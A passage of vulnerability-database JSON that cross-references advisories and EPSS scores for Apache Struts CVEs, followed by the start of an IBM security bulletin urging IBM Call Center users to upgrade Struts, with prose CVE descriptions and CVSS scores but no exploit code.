"BC46DAAE-9274-500B-A6A2-DB7DA8EAF068", "BD05B538-25EA-5C42-AE8D-229D78B57CB1", "C878132C-FB46-5C51-9D3B-B87DB3578112", "EF22B1BD-85C3-525C-B7D6-94014939E96B"]}, {"type": "hackerone", "idList": ["H1:192567"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20130730-STRUTS", "HUAWEI-SA-20140707-01-STRUTS2", "HUAWEI-SA-20160527-01-STRUTS2", "HUAWEI-SA-20200902-01-STRUTS2"]}, {"type": "ibm", "idList": ["01248F9A2B5FC0D8512B0420CFF5D341E6709588C362C360A9AAA46F41E5DBCB", "055E59F2851A7F333363149D5BB7D9E0D90ADD13DFCB70EC1FF9D592FA2988C8", "0EFD650EEA159FFAAF0AF62ECF4B96405F055BDF0550BBA080DA417521ED1777", "0FEF8414C4D35E1CF57FAA80A4963C99470B852C3455B106AAEEAFC9EF57A118", "1029DD6F473AD662889F3629D432E043E9F3053CFAFEA7698ACCBEF97F9ED67E", "1ACE28547BE3389A3B4A597C3931287B4604180F5F58DB6750D0FA0C4F985E29", "20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "2728A54A733C1334AD5FF98B90433841FD176869AA41A20F157E87B17EAD4D49", "2AFBF2C6283BFC034A1B1E6F54BF3EE78F6C81068FEC44D15429E6EF57A34831", "32DCD35C3BB7B9808D44714AAD5E5C0933C76D0D44C2BAABB1E72D83748235D2", "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "3FA2879FBADE8540F6B4D5091DA5772A30EB11207B58722F47A672ABFF7C289C", "43ABDDEF8A51FB28FC8C4825BAD26A0A25F5F21805BFC87561A0AEABFD065F37", "456B2EB80A04726EA1ABA567940D381A0E2976991206F33CA962674055ED3FD9", "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "47A9526430C9C366FECCD6852CFBC71095166B7357B960378A8A4EBF55B1FBCC", "4A381BCE879007EE4A86AB36C442564101BE6658BEA8959F0008297BA94F8BE4", "4BFC90633BA83FD67BCF8A4A78E4127D23966CEB4A6273663E5713B2666F736F", "4C0DBF63A15F96E4F2164C15299BAC4C8BB35F5DA0A29941D47EAB5DD8E7F12A", "5286AF354DA84BB562B116A3416B9C765F3ED708765C101691CABFF974122A28", "537B22B8CE459B9A1F69D2C0B048285809BE489DF5CCFAFBEA20193EE0CB2EA1", "57D5D7F551864FE98EB015D9D1AEB418275353D91DF5CC988649246B5CB1C2F5", "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "64DB3E655F72A48F214A03210C6CABBA2AF9FDD7CFBEC664636D3A72117B8C35", "6900D265BE47AA90C298D0D7770A85C4D26AD1BCA850041A3008AD885B0E1606", "6AB7EE25CEFEC99E5658BEFE4D594FAAA375C1558F00A1900E6FF8619C6CA80A", "76FF52EA4C6CD7649F1D390FCF31D87F0192327E3F142514A23D24C630BBDD85", "7F8F02D6D093C8CE68EF519749184D5E3DA2F0A4FC5E9A8C45DADD8885AA6579", "809237077FCC3D7946948EF3FA21FE3D90B0A0CB1F84CDAB9C1A81AA794E8B6C", "85068BA05AFB9468D768F124D70E29FEAA718CF85C40196DF1FFB790C80EABFF", "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "9655812C157678ED2990414C144E3BE29B141DF944F935E84247C6809BFAF59A", "98B23F6FBC89B642E5DC206D9014376ABD6C0435129FB8C81177F33D5AEBB6C3", "9E30BEC40A5B1EB3EFF9463956D6D4D9746A49D406672F9E4FDA4DB5EA368574", "B4FD409846BC477F7E2953E4C8F960515DC4E0D5564EB720E28E817DE28FA2C0", "B8C124EE4E419DE7F41A9CB0246E9FF21300C4C9A2734EF999830B9906B65133", "BE38ED822E7AF0C00178B9F33546DB67627005E6481750CB7374811E7F5674AE", "C07414E8C52FB3463AC172E97ABC5C7C15B6D3B1D98BDB2065BF167AE36DA8E9", "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "D3960A5391CDBC3EFE71D2AF6765F7AAC5104A881ACFC37A5D48C02CA2E26DF0", "D440AB0DC8D9679FF2760722F07B74524E47DD8175CD280720BB282C7015F027", "D68D8E96CFEEA20788D774DC41555B0BE3390F1E2DFCA1C7093ABC2ACCB666A8", "D7F5135F5917DEC79A3EC5F40696F566955841FB3632FC8C822946EC528790B3", "DE610DDFE9494156D25DDA58CDDC5C5009E3BBAAB1D9C6FC73CE6056DFE0DCFA", "DED899C681C4F01F658F5349E77058BDF8C51E88FADBC17AC63AAD856B4CADE5", "DFFF28230614331A1F13B0124F5F0C7C78FA27A1A224A596CB2E642B9DA21C5A", "E3347BCB529A35601F044748C20F62BDDA272E18F4F99AF1DC1EC2079BD36858", "E4B17BF9EB94818B3DD67E5BE6300EFD410A818EA54EBAE7A739EFDF92086058", "E4E6D09992473E915A5B9D428C1AD32743DE91E85736331CA3E338064E329F6C", "E56288EDC7334DB7071F8CD6CA5FDC34E7640BBDBAA8DE26D5CF6ED392AED43B", "E75B5477B1B8C94C3E41ADB651DA94840285BEAFCEF678CCC6604791158D16D7", "E76EDE876E613BFC954CF35B3BAEC06C0673334FEC47193E6686A3BF544CDE1D", "EB2D86A7BBA252757A65C0A0A0329A0AD6B47B01B8C03C060D72D11BD2074A52", "EEB5E3A20CE906548C150AD283F137973498C050F9D169FCCE570F819E6BCEDE", "F71D5D04C2F0092342927E605713DFE45269C2A24CFC53DC412619417A4461D1", "F7297DEE78789012F7802C00A7D437B06424929237D39542808A1D9905687922"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353"]}, {"type": "jvn", "idList": ["JVN:19294237", "JVN:25435092", "JVN:33504150", "JVN:43969166", "JVN:50890770", "JVN:79099262", "JVN:88408929", "JVN:95989300"]}, {"type": "kitploit", "idList": ["KITPLOIT:4611207874033525364", "KITPLOIT:5420210148456420402"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-STRUTS2_MULTI_EVAL_OGNL-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891264"]}, {"type": "nessus", "idList": ["ARCHIVA_1_3_8.NASL", "F5_BIGIP_SOL23432135.NASL", "GENTOO_GLSA-201409-04.NASL", "IBM_STORWIZE_1_5_0_2.NASL", "MYSQL_ENTERPRISE_MONITOR_2_3_14.NASL", "MYSQL_ENTERPRISE_MONITOR_2_3_17.NASL", "MYSQL_ENTERPRISE_MONITOR_2_3_20.NASL", "MYSQL_ENTERPRISE_MONITOR_3_0_11.NASL", "MYSQL_ENTERPRISE_MONITOR_3_0_19.NASL", "MYSQL_ENTERPRISE_MONITOR_3_0_5.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "MYSQL_ENTERPRISE_MONITOR_8_0_24.NASL", "ORACLE_WEBCENTER_SITES_APR_2015_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "SELLIGENT_MESSAGE_STUDIO_CVE-2013-2251.NBIN", "STRUTS_2_2_1.NASL", "STRUTS_2_2_3.NASL", "STRUTS_2_3_14_1.NASL", "STRUTS_2_3_14_2.NASL", "STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL", "STRUTS_2_3_14_3.NASL", "STRUTS_2_3_14_3_COMMAND_EXECUTION.NASL", "STRUTS_2_3_14_3_S2012.NASL", "STRUTS_2_3_15_1.NASL", "STRUTS_2_3_15_1_COMMAND_EXECUTION.NASL", "STRUTS_2_3_15_2.NASL", "STRUTS_2_3_15_2_LOCAL.NASL", "STRUTS_2_3_15_3.NASL", "STRUTS_2_3_16_1.NASL", "STRUTS_2_3_16_1_CLASSLOADER_MANIPULATION.NASL", "STRUTS_2_3_16_1_WIN_LOCAL.NASL", "STRUTS_2_3_16_2.NASL", "STRUTS_2_3_16_2_DOS.NASL", "STRUTS_2_3_16_3.NASL", "STRUTS_2_3_1_1_REAL.NASL", "STRUTS_2_3_20_WIN_LOCAL.NASL", "STRUTS_2_3_24_1_WIN_LOCAL.NASL", "STRUTS_2_3_28_1_RCE.NASL", "STRUTS_2_3_28_1_WIN_LOCAL.NASL", "STRUTS_2_3_28_WIN_LOCAL.NASL", "STRUTS_2_3_29_WIN_LOCAL.NASL", "STRUTS_2_3_4_1.NASL", "STRUTS_2_5_13.NASL", "STRUTS_2_5_22.NASL", "STRUTS_2_5_26.NASL", "STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL", "STRUTS_REST_SHOWCASE_XSS.NASL", "STRUTS_S2-061.NASL", "STRUTS_S2-062.NASL", "STRUTS_SHOWCASE_XSS.NASL", "STRUTS_XWORK_OGNL_CODE_EXECUTION_SAFE.NASL", "STRUTS_XWORK_OGNL_CODE_EXECUTION_SAFE1.NASL", "SUSE_11_LIBMYSQL55CLIENT18-140527.NASL", "VCENTER_OPERATIONS_MANAGER_VMSA_2012-0013.NASL", "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0007.NASL", "VMWARE_VMSA-2012-0013.NASL", "VMWARE_VMSA-2012-0013_REMOTE.NASL", "WEB_APPLICATION_SCANNING_113226"]}, {"type": "openvas", "idList": ["OPENVAS:103558", "OPENVAS:1361412562310103558", "OPENVAS:1361412562310103883", "OPENVAS:1361412562310105910", "OPENVAS:1361412562310107007", "OPENVAS:1361412562310108243", "OPENVAS:1361412562310108626", "OPENVAS:1361412562310108627", "OPENVAS:1361412562310108628", "OPENVAS:1361412562310108629", "OPENVAS:1361412562310121267", "OPENVAS:1361412562310801441", "OPENVAS:1361412562310801663", "OPENVAS:1361412562310802422", "OPENVAS:1361412562310802425", "OPENVAS:1361412562310803837", "OPENVAS:1361412562310803838", "OPENVAS:1361412562310807972", "OPENVAS:1361412562310808021", "OPENVAS:1361412562310808080", "OPENVAS:1361412562310809474", "OPENVAS:1361412562310809475", "OPENVAS:1361412562310811315", "OPENVAS:1361412562310811316", "OPENVAS:1361412562310812011", "OPENVAS:1361412562310850784", "OPENVAS:801441", "OPENVAS:801663", "OPENVAS:802422", "OPENVAS:802425", "OPENVAS:803837", "OPENVAS:803838"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2015", "ORACLE:CPUAPR2017", "ORACLE:CPUAPR2021", "ORACLE:CPUAPR2022", "ORACLE:CPUJAN2014-1972949", "ORACLE:CPUJAN2021", "ORACLE:CPUJAN2022", "ORACLE:CPUJUL2015", "ORACLE:CPUJUL2016", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2013-1899837", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2021"]}, {"type": "osv", "idList": ["OSV:GHSA-265R-PP83-GWW7", "OSV:GHSA-2RVH-Q539-Q33V", "OSV:GHSA-383P-XQXX-RRMP", "OSV:GHSA-3C5C-XRQ4-QHR8", "OSV:GHSA-47QP-8V9G-39HP", "OSV:GHSA-4QGJ-9MVG-3929", "OSV:GHSA-56F8-G68R-J699", "OSV:GHSA-737W-MH58-CXJP", "OSV:GHSA-7GHM-RPC7-P7G5", "OSV:GHSA-8FX9-5HX8-CRHM", "OSV:GHSA-CCP5-GG58-PXFM", "OSV:GHSA-GQQM-564F-VVXQ", "OSV:GHSA-H4V9-JF2R-9H6M", "OSV:GHSA-HMHQ-382Q-MP56", "OSV:GHSA-HRGC-54MV-58GV", "OSV:GHSA-J7H6-XR7G-M2C5", "OSV:GHSA-JC35-Q369-45PV", "OSV:GHSA-M3X6-9V6H-4G28", "OSV:GHSA-MWRX-HX6X-3HHV", "OSV:GHSA-PRJV-JJ26-WF8H", "OSV:GHSA-PVM9-288C-V5WQ", "OSV:GHSA-PW8R-X2QM-3H5M", "OSV:GHSA-Q5Q8-JGHF-3PM3", "OSV:GHSA-RPJ9-R897-WC6Q", "OSV:GHSA-V8J6-6C2R-R27C", "OSV:GHSA-VRWC-QJMW-5RJM", "OSV:GHSA-VWHV-J36G-5RM8", "OSV:GHSA-WHMQ-V94Q-34P9", "OSV:GHSA-WP4H-PVGW-5727", "OSV:GHSA-X5FC-PGPX-59J5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101323", "PACKETSTORM:104227", "PACKETSTORM:113272", "PACKETSTORM:121847", "PACKETSTORM:122541", "PACKETSTORM:122796", "PACKETSTORM:122797", "PACKETSTORM:126445", "PACKETSTORM:136856", "PACKETSTORM:159629", "PACKETSTORM:160108", "PACKETSTORM:160721", "PACKETSTORM:91774"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:FE0BAF7268104D525CC0A2ABC0471C4C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5482AC1594C82A230828023816657B57", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49"]}, {"type": "redhat", "idList": ["RHSA-2019:0910"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-3093", "RH:CVE-2016-4436", "RH:CVE-2017-12611", "RH:CVE-2019-0230", "RH:CVE-2019-0233", "RH:CVE-2020-17530", "RH:CVE-2021-31805"]}, {"type": "saint", "idList": ["SAINT:05F171426D41814939EA98ED1A825F67", "SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "SAINT:1D34925730D76AB12F475B2A125AC017", "SAINT:2158B27B9EAB9B393EED3784C4096BC1", "SAINT:279F8312DEF0028C5D034325A810E73D", "SAINT:2FE5CCE51B64707F8D205A80240A6467", "SAINT:30B69DA796085BC3E3B1C78E90D5EEF1", "SAINT:3C8676675136ED40AD965CF40F5B034D", "SAINT:4558D86B32E9DFCF5B5EEBFCAB072C31", "SAINT:46C06C664B1E5C691A77B2FC04327D68", "SAINT:4B122F6299581540A8429BAA06656ACE", "SAINT:52FE4CC3610DB129C039F9F864818929", "SAINT:61E99B83D8C03F67350245D1B8BDC99C", "SAINT:6A7FE32298A470E879AB2C759F6C43EB", "SAINT:6E895851192B9E656298357DF24A9556", "SAINT:7B263B551E3799A3C795713D657E1BD2", "SAINT:7BC59B3330A7820A216EA06973B8F0C8", "SAINT:828C60321F2ABC177EBA08F435872B1B", "SAINT:891A42933A0DE986694E3B7D51B3F2F1", "SAINT:8B8924409E9AFE277FF0998CBA641AF8", "SAINT:AE1DA80E6B0E4C12B5D781794166897B", "SAINT:C0B4D5468890CF90769399ACED5F1513", "SAINT:C2F1CFAE3C24599334963A0CD12F3E0B", "SAINT:D1B88155F516D415CE4F67A190458DDB", "SAINT:D5D4A387859B0AFB11066636D506EF3B"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26351", "SECURITYVULNS:DOC:29765", "SECURITYVULNS:DOC:29766", "SECURITYVULNS:DOC:30528", "SECURITYVULNS:DOC:30529", "SECURITYVULNS:DOC:30568", "SECURITYVULNS:DOC:30825", "SECURITYVULNS:VULN:11662", "SECURITYVULNS:VULN:13263", "SECURITYVULNS:VULN:13378", "SECURITYVULNS:VULN:13423", "SECURITYVULNS:VULN:13537", "SECURITYVULNS:VULN:13701", "SECURITYVULNS:VULN:13714", "SECURITYVULNS:VULN:13836", "SECURITYVULNS:VULN:14393", "SECURITYVULNS:VULN:14601"]}, {"type": "seebug", "idList": ["SSV:19954", "SSV:20526", "SSV:20538", "SSV:30098", "SSV:60807", "SSV:60812", "SSV:60836", "SSV:60906", "SSV:60909", "SSV:61048", "SSV:61049", "SSV:61709", "SSV:69390", "SSV:91389", "SSV:96425"]}, {"type": "suse", "idList": ["SUSE-SU-2014:0769-1"]}, {"type": "thn", "idList": ["THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:7FD924637D99697D78D53283817508DA"]}, {"type": "threatpost", "idList": ["THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:40B4CEF304ADBCA0734F292661E7810B", "THREATPOST:9C73922123182D0FF51BB36348E2ED36", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:F3CCF4A5ECFE4B0E862CEE7C1076E03E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-1870", "UB:CVE-2011-5057", "UB:CVE-2012-0391", "UB:CVE-2012-0392", "UB:CVE-2012-0393", "UB:CVE-2012-0838", "UB:CVE-2012-1006", "UB:CVE-2012-4386", "UB:CVE-2012-4387", "UB:CVE-2013-1965", "UB:CVE-2013-1966", "UB:CVE-2013-2134", "UB:CVE-2013-2135", "UB:CVE-2013-2251", "UB:CVE-2013-4310", "UB:CVE-2013-4316", "UB:CVE-2014-0094", "UB:CVE-2014-0112", "UB:CVE-2014-0113", "UB:CVE-2014-0116", "UB:CVE-2014-7809", "UB:CVE-2015-2992", "UB:CVE-2015-5169", "UB:CVE-2015-5209", "UB:CVE-2016-3081", "UB:CVE-2016-3082", "UB:CVE-2016-3093", "UB:CVE-2016-4003", "UB:CVE-2016-4436", "UB:CVE-2017-12611", "UB:CVE-2019-0230", "UB:CVE-2019-0233", "UB:CVE-2020-17530", "UB:CVE-2021-31805"]}, {"type": "veracode", "idList": ["VERACODE:26331", "VERACODE:26332", "VERACODE:28516", "VERACODE:35070", "VERACODE:5038", "VERACODE:758"]}, {"type": "vmware", "idList": ["VMSA-2011-0005", "VMSA-2011-0005.3", "VMSA-2012-0013", "VMSA-2012-0013.2", "VMSA-2014-0007", "VMSA-2014-0007.2"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851"]}, {"type": "zdt", "idList": ["1337DAY-ID-20837", "1337DAY-ID-21032", "1337DAY-ID-22210", "1337DAY-ID-25410", "1337DAY-ID-27400", "1337DAY-ID-30271", "1337DAY-ID-35084", "1337DAY-ID-35263", "1337DAY-ID-35571"]}]}, "score": {"value": 10.3, "vector": "NONE"}, "epss": [{"cve": "CVE-2010-1870", "epss": 0.03864, "percentile": 0.90577, "modified": "2023-05-01"}, {"cve": "CVE-2011-1772", "epss": 0.0043, "percentile": 0.70701, "modified": "2023-05-02"}, {"cve": "CVE-2011-5057", "epss": 0.01033, "percentile": 0.81681, "modified": "2023-05-02"}, {"cve": "CVE-2012-0391", "epss": 0.14646, "percentile": 0.94907, "modified": "2023-05-02"}, {"cve": "CVE-2012-0392", "epss": 0.97059, "percentile": 0.99598, "modified": "2023-05-02"}, {"cve": "CVE-2012-0393", "epss": 0.94317, "percentile": 0.98733, "modified": "2023-05-02"}, {"cve": "CVE-2012-0838", "epss": 0.01889, "percentile": 0.86714, "modified": "2023-05-02"}, {"cve": "CVE-2012-1006", "epss": 0.61374, "percentile": 0.97244, "modified": "2023-05-02"}, {"cve": "CVE-2012-4386", "epss": 0.00268, "percentile": 0.62789, "modified": "2023-05-02"}, {"cve": "CVE-2012-4387", "epss": 0.02305, "percentile": 0.88085, "modified": "2023-05-02"}, {"cve": "CVE-2013-1965", "epss": 0.00813, "percentile": 0.79334, "modified": "2023-05-02"}, {"cve": "CVE-2013-1966", "epss": 0.01858, "percentile": 0.86601, "modified": "2023-05-01"}, {"cve": "CVE-2013-2115", "epss": 0.00595, "percentile": 0.75164, "modified": "2023-05-02"}, {"cve": "CVE-2013-2134", "epss": 0.97071, "percentile": 0.99607, "modified": "2023-05-01"}, {"cve": "CVE-2013-2135", "epss": 0.95739, "percentile": 0.99069, "modified": "2023-05-02"}, {"cve": "CVE-2013-2248", "epss": 0.97324, "percentile": 0.99778, "modified": "2023-05-02"}, {"cve": "CVE-2013-2251", "epss": 0.97432, "percentile": 0.99889, "modified": "2023-05-01"}, {"cve": "CVE-2013-4310", "epss": 0.02037, "percentile": 0.87265, "modified": "2023-05-02"}, {"cve": "CVE-2013-4316", "epss": 0.00871, "percentile": 0.80033, "modified": "2023-05-02"}, {"cve": "CVE-2014-0094", "epss": 0.97175, "percentile": 0.99659, "modified": "2023-05-01"}, {"cve": "CVE-2014-0112", "epss": 0.97404, "percentile": 0.9986, "modified": "2023-05-01"}, {"cve": "CVE-2014-0113", "epss": 0.96867, "percentile": 0.99494, "modified": "2023-05-02"}, {"cve": "CVE-2014-0116", "epss": 0.00865, "percentile": 0.79967, "modified": "2023-05-02"}, {"cve": "CVE-2014-7809", "epss": 0.00192, "percentile": 0.55316, "modified": "2023-05-02"}, {"cve": "CVE-2015-2992", "epss": 0.00725, "percentile": 0.77867, "modified": "2023-05-01"}, {"cve": "CVE-2015-5169", "epss": 0.00481, "percentile": 0.72282, "modified": "2023-05-02"}, {"cve": "CVE-2015-5209", "epss": 0.00305, "percentile": 0.65255, "modified": "2023-05-02"}, {"cve": "CVE-2016-3081", "epss": 0.97524, "percentile": 0.99976, "modified": "2023-05-01"}, {"cve": "CVE-2016-3082", "epss": 0.95903, "percentile": 0.99122, "modified": "2023-05-02"}, {"cve": "CVE-2016-3093", "epss": 0.02732, "percentile": 0.88975, "modified": "2023-05-02"}, {"cve": "CVE-2016-4003", "epss": 0.01905, "percentile": 0.86789, "modified": "2023-05-02"}, {"cve": "CVE-2016-4436", "epss": 0.02365, "percentile": 0.88225, "modified": "2023-05-02"}, {"cve": "CVE-2017-12611", "epss": 0.97358, "percentile": 0.99804, "modified": "2023-05-02"}, {"cve": "CVE-2019-0230", "epss": 0.87271, "percentile": 0.98074, "modified": "2023-05-01"}, {"cve": "CVE-2019-0233", "epss": 0.12368, "percentile": 0.94549, "modified": "2023-05-01"}, {"cve": "CVE-2020-17530", "epss": 0.96641, "percentile": 0.99383, "modified": "2023-05-01"}], "vulnersScore": 10.3}, "_state": {"dependencies": 1687588226, "score": 1687589890, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "4779a8713d8c61f617b9a179f6b7958a"}, "affectedSoftware": [{"version": "9.5", "operator": "eq", "name": "sterling selling and fulfillment suite"}, {"version": "10.", "operator": "eq", "name": "sterling selling and fulfillment suite"}]}

{"ibm": [{"lastseen": "2023-06-24T05:58:27", "description": "## Summary\n\nApache Struts is used by IBM Call Center as part of its web application framework used for creating Java EE web applications. It is vulnerable to various CVEs, listed below. We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 12.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the 